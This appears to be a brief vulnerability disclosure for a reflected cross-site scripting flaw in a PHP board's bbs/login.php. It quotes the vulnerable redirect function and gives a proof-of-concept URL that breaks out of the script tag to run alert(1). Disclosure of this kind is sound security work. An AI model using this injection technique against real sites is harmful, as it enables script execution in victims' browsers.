# limited Reflective xss in bbs/login.php
in bbs/login.php parameter `$url` only single quotes and double quotes are transferred.
and in function `check_url_host`, if url without start with http or https, the url parameter will be treated as a path without any fiiter.
in functio0n `goto_url`
```
function goto_url($url)
{
$url = str_replace("&", "&", $url);
//echo "<script> location.replace('$url'); </script>";
if (!headers_sent())
header('Location: '.$url);
else {
echo '<script>';
echo 'location.replace("'.$url.'");';
echo '</script>';
echo '<noscript>';
echo '<meta http-equiv="refresh" content="0;url='.$url.'" />';
echo '</noscript>';
}
exit;
}
```
when `headers_sent()` return True,the parameter url will be directly spliced into javascript.
Although we can't use double quotes, we can escape directly with `</script>`
```
/bbs/login.php?url=www.baidu.com</script><script>alert(1)</script>
```
Unavailable Comments